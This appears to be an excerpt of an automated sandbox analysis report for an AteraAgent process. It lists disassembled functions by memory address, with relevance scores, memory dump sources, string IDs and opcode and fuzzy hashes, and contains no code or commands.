                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: huR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2690380414
                                                                                                                                                                                                                                                                                                • Opcode ID: 9ebbda2da63e1b12924bb823fe09676d51d3ca592d9bb33cdc37eead7d691c8a
                                                                                                                                                                                                                                                                                                • Instruction ID: 407b406b30812b1aeda9d3a70e46d69ef377039ba3dfbf22a190130dd2682698
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ebbda2da63e1b12924bb823fe09676d51d3ca592d9bb33cdc37eead7d691c8a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A071E031B1AA4A8FE7B9EB6C88A81B577D1FF59700B16057ED08EC33A2DD24AD41C741
                                                                                                                                                                                                                                                                                                Function 00007FFD9B592F09 Relevance: 1.5, Strings: 1, Instructions: 250COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: r3_H
                                                                                                                                                                                                                                                                                                • API String ID: 0-2205902075
                                                                                                                                                                                                                                                                                                • Opcode ID: ae599f4313ee489149b81129c821507e321bacbebd8a056bb2a7d4014672af6f
                                                                                                                                                                                                                                                                                                • Instruction ID: 4caa4192cb0982a6b7b59c787b169e92e8c7475b2b8270efe2809ec02e5cf390
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae599f4313ee489149b81129c821507e321bacbebd8a056bb2a7d4014672af6f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D717271B0994D8FEFE5EBAC8469AA837E1FF68340F450179D40DD72A2DE29AD41C780
                                                                                                                                                                                                                                                                                                Function 00007FFD9B39C5E5 Relevance: 1.5, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: H
                                                                                                                                                                                                                                                                                                • API String ID: 0-2852464175
                                                                                                                                                                                                                                                                                                • Opcode ID: 2e0f80560ed923114b508e826e18b1c8f043404ff5bd162e6817b4ef39f1578f
                                                                                                                                                                                                                                                                                                • Instruction ID: facc22fb18ccbd2e5f6903ee0eef6436dad790d47ff6bc2c6c244b8732198178
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e0f80560ed923114b508e826e18b1c8f043404ff5bd162e6817b4ef39f1578f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9612352B0E95A8FF7B4F6AC64656F97BC0EF45360B4A01BAD04CC71A3EE186C428380
                                                                                                                                                                                                                                                                                                Function 00007FFD9B388A55 Relevance: 1.5, Strings: 1, Instructions: 226COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: x6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2013557542
                                                                                                                                                                                                                                                                                                • Opcode ID: a07c6a094109b1023e0e90f813361be453c103a5f087d6e43ecfa2f2eb30dc3d
                                                                                                                                                                                                                                                                                                • Instruction ID: bf3dc736ac5302b348029453399e2e8549b24c9f12040746d2e64e5cd8ca78c1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a07c6a094109b1023e0e90f813361be453c103a5f087d6e43ecfa2f2eb30dc3d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4361F771E0AA4D8FDB65EBA498616E9BBB0FF55300F45027ED00CD71E2DA3C6A82C751
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38D0A8 Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: ^M_^
                                                                                                                                                                                                                                                                                                • API String ID: 0-3273950326
                                                                                                                                                                                                                                                                                                • Opcode ID: 80895c13c9e0faa59b49face2b179064ae706ca292f35106562d0ae593a5ae5e
                                                                                                                                                                                                                                                                                                • Instruction ID: 429d533e8dcd3c0c5cd309f206fd8ea9ccd282357028f21a1c98721efe33e7fa
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80895c13c9e0faa59b49face2b179064ae706ca292f35106562d0ae593a5ae5e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B51A662B1E7954FD306B778A4665E83BA0EF4323574942F7C089CF1E7E9582C46C392
                                                                                                                                                                                                                                                                                                Function 00007FFD9B3805A0 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: x6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2013557542
                                                                                                                                                                                                                                                                                                • Opcode ID: 382838c877a20a60934b30d9f27a37e3fba67f3bd250681e5c85140cc19f0d29
                                                                                                                                                                                                                                                                                                • Instruction ID: 5a126c7773fa9b8630ed0fb6fab56fd70d89400745c6cebeda9f87c4f21bb3ef
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 382838c877a20a60934b30d9f27a37e3fba67f3bd250681e5c85140cc19f0d29
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41516C71E1AA0D8FDB64EBD8D4616FDB7B1FF58300F51003EE409E7291CA3869458B41
                                                                                                                                                                                                                                                                                                Function 00007FFD9B388AA5 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: x6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2013557542
                                                                                                                                                                                                                                                                                                • Opcode ID: 6b6fbb21d73ecf0cbd163fcc5768447c5210f20270e0d092e453b16143f4dbbf
                                                                                                                                                                                                                                                                                                • Instruction ID: f75ce46bceab552f9240fe2b83931eeea846cd711709113c9ad9883178dc00af
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b6fbb21d73ecf0cbd163fcc5768447c5210f20270e0d092e453b16143f4dbbf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F510771E0AA8D4FDB95DBA488616E97BF0FF55310F0502BBD008D72E2CA3C6A46C751
                                                                                                                                                                                                                                                                                                Function 00007FFD9B594E64 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: S:_H
                                                                                                                                                                                                                                                                                                • API String ID: 0-2485425967
                                                                                                                                                                                                                                                                                                • Opcode ID: e48bad278094801f53b9b4c0846a421c0c6bab7fcb5a30db73ba5727f6830f07
                                                                                                                                                                                                                                                                                                • Instruction ID: faeaab49be0368634dfe3eb1596cf7aa33a5f17d662ccd6e91dce204509b99d7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e48bad278094801f53b9b4c0846a421c0c6bab7fcb5a30db73ba5727f6830f07
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E41DE31B1DE4E4FEBA9DB5C8415576B3E1FBA8710B45427EE849C3266EE20FD028781
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38CD7D Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: x6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2013557542
                                                                                                                                                                                                                                                                                                • Opcode ID: 487ed547e1d09287b8aeb0acf4f1ebb864e02e2ab74f094850a8eb18bc7ea584
                                                                                                                                                                                                                                                                                                • Instruction ID: 59670e6b18021cd65a1e40d32bbe5e974b48113f9d71c131293b01ed3413a31b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 487ed547e1d09287b8aeb0acf4f1ebb864e02e2ab74f094850a8eb18bc7ea584
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36411936B1DD2A8FE764FAACA4551EC73D1EF9836274501BFD149C3192CE25BC068781
                                                                                                                                                                                                                                                                                                Function 00007FFD9B392A2D Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: XuR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2753689043
                                                                                                                                                                                                                                                                                                • Opcode ID: d2adfc615185c1ff36ff91972e3a3b58699143121a9a0a9804cd8adb7d8af282
                                                                                                                                                                                                                                                                                                • Instruction ID: 4f0ab900a8e68a082ce819775b38910456116ff908f32402c88de145636332b0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2adfc615185c1ff36ff91972e3a3b58699143121a9a0a9804cd8adb7d8af282
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38412432B0FE894FE7AAE66D48A59613BC1EF5528034A40FED448CB2B2DD25ED458341
                                                                                                                                                                                                                                                                                                Function 00007FFD9B382F45 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: aO_H
                                                                                                                                                                                                                                                                                                • API String ID: 0-2621181374
                                                                                                                                                                                                                                                                                                • Opcode ID: f6eef4752fb36991a9856713ecaf1af8650c2d01fa9212a6651742c19cf25238
                                                                                                                                                                                                                                                                                                • Instruction ID: cc354775d92423fba2243d88ca331a0e2dea640adb9ec4c1d52b5008608f8446
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6eef4752fb36991a9856713ecaf1af8650c2d01fa9212a6651742c19cf25238
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29510670A19A1D8FDF94EFA8C864AEDBBB1FF59300F110169E40DE7295DA34A940CB80
                                                                                                                                                                                                                                                                                                Function 00007FFD9B383C3D Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: x6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2013557542
                                                                                                                                                                                                                                                                                                • Opcode ID: 7cb7b315f3945f748c7ce6985301021a0d5c675636ce2e7529609b8fc2e6e46f
                                                                                                                                                                                                                                                                                                • Instruction ID: 516e83e3d2605338e19e24788a98b6c1bc948b2a4b636b93783546613e74f709
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7cb7b315f3945f748c7ce6985301021a0d5c675636ce2e7529609b8fc2e6e46f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E841AF71E09A4D8FDB94EFA8C8556EDB7B1FF58300F41017AE409D72A1DB386945CB41
                                                                                                                                                                                                                                                                                                Function 00007FFD9B3838E1 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: `\uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2833859232
                                                                                                                                                                                                                                                                                                • Opcode ID: d8029c510d46aeb193bef66a2426d24b75ed2006022e6e7e29ae55a660c873bd
                                                                                                                                                                                                                                                                                                • Instruction ID: f134127faf0423058cb7b1deb947ddc07509a7a333d8fa66f2c7325a269f79b4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8029c510d46aeb193bef66a2426d24b75ed2006022e6e7e29ae55a660c873bd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B412B71E09A4D8FDB85EFA8C451AEDBBF0FF69300F0501A6D408D72A2DB34AA45CB51
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38A010 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 0uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1082554596
                                                                                                                                                                                                                                                                                                • Opcode ID: 3ffd47f1c2d241a9aa74ff9e2d904a7d2099f9c1457e7679871ef969f2543560
                                                                                                                                                                                                                                                                                                • Instruction ID: 36369523a0e62a37a7c9a43cacb6a6e32be32b544d5cb36bbbd44a1e41de8be4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ffd47f1c2d241a9aa74ff9e2d904a7d2099f9c1457e7679871ef969f2543560
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B41AF3071DF498FEBA5EB6CC0A0E6277D1EF58300B1645ADD08AC76A6CD25F945C740
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38A01D Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 0uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1082554596
                                                                                                                                                                                                                                                                                                • Opcode ID: 9f9b966c3a643cdaea035089047e650e7de44b0da9d11d0f80e2a626291be82b
                                                                                                                                                                                                                                                                                                • Instruction ID: c238350b3fe26e1972c2b4f1021517d5b6cbcea44fe0e2d1a855e2ae6f12957d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f9b966c3a643cdaea035089047e650e7de44b0da9d11d0f80e2a626291be82b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA41CF3071EF498FEBA5EB6CC0A0E6573E1FF59300B1645BAD08AC76A6C924F945CB41
                                                                                                                                                                                                                                                                                                Function 00007FFD9B382F38 Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: aO_H
                                                                                                                                                                                                                                                                                                • API String ID: 0-2621181374
                                                                                                                                                                                                                                                                                                • Opcode ID: 54352adbe1fc57f9b4b7a2515ad3603a2b1b607b0d5fc2c336c57c7ee5e37b05
                                                                                                                                                                                                                                                                                                • Instruction ID: 08ea676ac09c236bf478139832130f704668e1f81c3667f29d2ea1211ba99977
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54352adbe1fc57f9b4b7a2515ad3603a2b1b607b0d5fc2c336c57c7ee5e37b05
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07412870E19A1D8FDF54EFA8C865AEDBBB1EF59304F110169D00DE7296DA34A941CB40
                                                                                                                                                                                                                                                                                                Function 00007FFD9B3884BA Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: x6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2013557542
                                                                                                                                                                                                                                                                                                • Opcode ID: 9f45f18c1a25518aedadf6102786f5484d63d5a2ce253467d82c4e9cfedd6350
                                                                                                                                                                                                                                                                                                • Instruction ID: 24e39d8cceb084077c7b4cd23efc43e91da13370c579958f429fcc2872eff6ce
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f45f18c1a25518aedadf6102786f5484d63d5a2ce253467d82c4e9cfedd6350
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C541F471E0AA4D8FDB95EBA8C4616EDBBF1FF59340F41017AC009D7192DA386946CB41
                                                                                                                                                                                                                                                                                                Function 00007FFD9B387130 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: x6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2013557542
                                                                                                                                                                                                                                                                                                • Opcode ID: 636da88075c92137bd2c52414d42947ce4c0e4cfb7364bbe7c7467f385b4572e
                                                                                                                                                                                                                                                                                                • Instruction ID: 8a89aa2d76ce0e882313e5f43d2a926159cdca6bf541f9c29c24b0edc8d337a2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 636da88075c92137bd2c52414d42947ce4c0e4cfb7364bbe7c7467f385b4572e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B310931B1DE0D8FD768EAAC985957977E1EF99711B4501BFE049C32A2DE20AC428781
                                                                                                                                                                                                                                                                                                Function 00007FFD9B5942C2 Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: ,_H
                                                                                                                                                                                                                                                                                                • API String ID: 0-1596733131
                                                                                                                                                                                                                                                                                                • Opcode ID: 8d304613550fb378bb379e2539a16442dbdfe77f0c65af550f5e73cccd0bdb78
                                                                                                                                                                                                                                                                                                • Instruction ID: c2b62d65f872e94506d3704683c23807d1fac8bd75682059560663b645a3f670
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d304613550fb378bb379e2539a16442dbdfe77f0c65af550f5e73cccd0bdb78
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97516470A0892D8FDFA5EB18C895BE9B7B1FB69301F0140E9904DD7261CA74AEC0CF40
                                                                                                                                                                                                                                                                                                Function 00007FFD9B594294 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: ,_H
                                                                                                                                                                                                                                                                                                • API String ID: 0-1596733131
                                                                                                                                                                                                                                                                                                • Opcode ID: 43879e5d8a5ed6de40971da13bbb3f7b3ee3921ce5e145d7bd07ee6672cf4351
                                                                                                                                                                                                                                                                                                • Instruction ID: df7ccbdaa2b2cce806418e5e650a68c091bfecc587088614483bfda8b2ca3476
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43879e5d8a5ed6de40971da13bbb3f7b3ee3921ce5e145d7bd07ee6672cf4351
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7141A570A0992D8FDBE5EB18C8A5BE9B7B1FF69301F4140E9914DD7261CA74AE80CF40
                                                                                                                                                                                                                                                                                                Function 00007FFD9B5942A3 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: ,_H
                                                                                                                                                                                                                                                                                                • API String ID: 0-1596733131
                                                                                                                                                                                                                                                                                                • Opcode ID: 773f0928b7c2e71fc7f1408f37f862e1022af718434fdd66900712e7812da1fd
                                                                                                                                                                                                                                                                                                • Instruction ID: 125d8ba7d3f3023689f4d2855ad006a2d3c147d18a66469a8a1e9f0bba609443
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 773f0928b7c2e71fc7f1408f37f862e1022af718434fdd66900712e7812da1fd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E641B670A0892D8FDFE5EB58C8A5BE9B7B1EF69301F4100E9914DD7261CA74AE808F40
